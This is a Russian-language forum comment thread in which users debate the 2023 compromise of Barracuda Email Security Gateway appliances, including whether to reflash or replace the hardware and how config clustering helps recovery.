Ответить | Правка | Наверх | Cообщить модератору |
124. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Tron is Whistling (?), 13-Июн-23, 09:19 | ||
АУДИТ, а не перебор zmap'ом. Вот сразу и видно, кто с чем знаком. | ||
Ответить | Правка | Наверх | Cообщить модератору |
127. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (114), 13-Июн-23, 10:24 | ||
> АУДИТ, а не перебор zmap'ом. Вот сразу и видно, кто с чем знаком. | ||
Ответить | Правка | Наверх | Cообщить модератору |
129. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Tron is Whistling (?), 13-Июн-23, 11:52 | ||
А У Д И Т | ||
Ответить | Правка | К родителю #127 | Наверх | Cообщить модератору |
99. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Поле Name не забыто и не прощено (?), 12-Июн-23, 14:26 | ||
Ладно, до конца подскажу :) | ||
Ответить | Правка | К родителю #97 | Наверх | Cообщить модератору |
107. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от пох. (?), 12-Июн-23, 19:01 | ||
обычная работа. Еще и по некритичному сервису, пол-часа без почты или резервным релеем где-то в щебенях поднятым специально для этой цели почти любая контора может пережить. | ||
Ответить | Правка | К родителю #93 | Наверх | Cообщить модератору |
62. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (62), 11-Июн-23, 22:39 | ||
А могли поставить съемный spi чип в дипоском корпусе в распаянную на плате кроватку установить. | ||
Ответить | Правка | Наверх | Cообщить модератору |
66. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Tron is Whistling (?), 11-Июн-23, 23:01 | ||
Какой блджад SPI чип. Какая кроватка. Там обычный x86 внутри. С SSD/HDD и поэтессами. | ||
Ответить | Правка | Наверх | Cообщить модератору |
76. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (76), 11-Июн-23, 23:59 | ||
>фирмварь полного образа ОС из себя не представляет. | ||
Ответить | Правка | Наверх | Cообщить модератору |
95. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Поле Name не забыто и не прощено (?), 12-Июн-23, 14:12 | ||
Ну давай, пройдись мне dd по железке, которая не даёт тебе полноценной консоли. А открыть корпус = слететь с гарантии. Это тебе не твой гаражик с ржавой шахой. | ||
Ответить | Правка | Наверх | Cообщить модератору |
137. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (137), 15-Июн-23, 00:16 | ||
Тоже мне бентли нашлась, лол. | ||
Ответить | Правка | Наверх | Cообщить модератору |
100. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Tron is Whistling (?), 12-Июн-23, 15:05 | ||
Ну там реально чего угодно может быть после порутания. | ||
Ответить | Правка | К родителю #76 | Наверх | Cообщить модератору |
103. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | –1 +/– | |
Сообщение от Аноним (47), 12-Июн-23, 17:03 | ||
Зачем? Дополнительные компоненты, кастомное железо, необходимость вскрывать корпус для замены, ESD-защита, квалификация персонала, и, главное, время. Раз уж апплаенс надо из стойки вынимать, то проще новый туда вставить, чем SPI отвёрткой из кроватки выковыривать. UPS доставит новую железку в течение 24 часов. Через 48 часов твой ещё чуть тёплый рутованный гейт будет у вендора в лаборатории на стенде ждать инженеров для анализа. А через пару месяцев может даже будет стоять в другой стойке у другого клиента после перепрошивки. | ||
Ответить | Правка | К родителю #62 | Наверх | Cообщить модератору |
84. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (84), 12-Июн-23, 08:18 | ||
"Email Security Gateway" | ||
Ответить | Правка | Наверх | Cообщить модератору |
92. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от пох. (?), 12-Июн-23, 11:17 | ||
> решение "to obtain a new ESG virtual or hardware appliance." | ||
Ответить | Правка | Наверх | Cообщить модератору |
96. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Поле Name не забыто и не прощено (?), 12-Июн-23, 14:14 | ||
Ды там кластеринг есть, 99% конфига синхронизируются. Если у кого-то железка одна - ну, ссзб. | ||
Ответить | Правка | Наверх | Cообщить модератору |
109. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от пох. (?), 12-Июн-23, 19:07 | ||
> Ды там кластеринг есть, 99% конфига синхронизируются. | ||
Ответить | Правка | Наверх | Cообщить модератору |
113. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Tron is Whistling (?), 12-Июн-23, 22:46 | ||
Не, синхронизироваться можно с новой машиной, образующей новый кластер. Процесс поднятия понимаемо ускоряется :) | ||
Ответить | Правка | Наверх | Cообщить модератору |
106. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (84), 12-Июн-23, 18:58 | ||
ты вообще не понял масштаб кабздеца. Заражается ESG через бэкдор, подгружаются левые демоны SMTP, от EGS заражается почтовый сервак, который ESG по-идее защищает, и понеслось заражение через email всех кто в базе почтовика. | ||
Ответить | Правка | К родителю #92 | Наверх | Cообщить модератору |
108. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от пох. (?), 12-Июн-23, 19:05 | ||
> ты вообще не понял масштаб кабздеца. Заражается ESG через бэкдор, подгружаются левые | ||
Ответить | Правка | Наверх | Cообщить модератору |
110. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (84), 12-Июн-23, 19:13 | ||
выше я отметил про SMTP из ориг.статьи. А то "несовм.железка" и пошло-поехало домысливание. | ||
Ответить | Правка | Наверх | Cообщить модератору |
125. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от pofigist (?), 13-Июн-23, 09:56 | ||
На счет конфигов - в современные конфиги некоторые умники очень любят встраивать поддержку скриптовых языков. То есть по факту мы имеем вместо старого, доброго тупого конфига - некий скрипт на sh/lua/PHP/etc... | ||
Ответить | Правка | К родителю #108 | Наверх | Cообщить модератору |
132. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от _ (??), 13-Июн-23, 22:50 | ||
Я Barracuda последний раз видел в 2015-6 году, на пямять - еЯ конфиг просто богомерзкий XML ... Не надо фантазий там где не надо. | ||
Ответить | Правка | Наверх | Cообщить модератору |
133. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от _ (??), 13-Июн-23, 22:52 | ||
>ты вообще не понял масштаб кабздеца. | ||
Ответить | Правка | К родителю #106 | Наверх | Cообщить модератору |
134. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Tron is Whistling (?), 13-Июн-23, 23:29 | ||
Да фиг ли там раскрывать. | ||
Ответить | Правка | Наверх | Cообщить модератору |
135. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от _ (??), 14-Июн-23, 17:27 | ||
:) | ||
Ответить | Правка | Наверх | Cообщить модератору |
136. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Tron is Whistling (?), 14-Июн-23, 19:59 | ||
У половины рогов и копыт именно так и бывает :D | ||
Ответить | Правка | Наверх | Cообщить модератору |
123. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Neon (??), 13-Июн-23, 03:17 | ||
Никогда такого не было и вот опять))) | ||
Ответить | Правка | Наверх | Cообщить модератору |
130. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (130), 13-Июн-23, 14:31 | ||
Чего там можно сделать с ошибкой было? | ||
Ответить | Правка | Наверх | Cообщить модератору |
Архив | Удалить |
Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема |
Закладки на сайте Проследить за страницей |
Created 1996-2024 by Maxim Chirkov Добавить, Поддержать, Вебмастеру |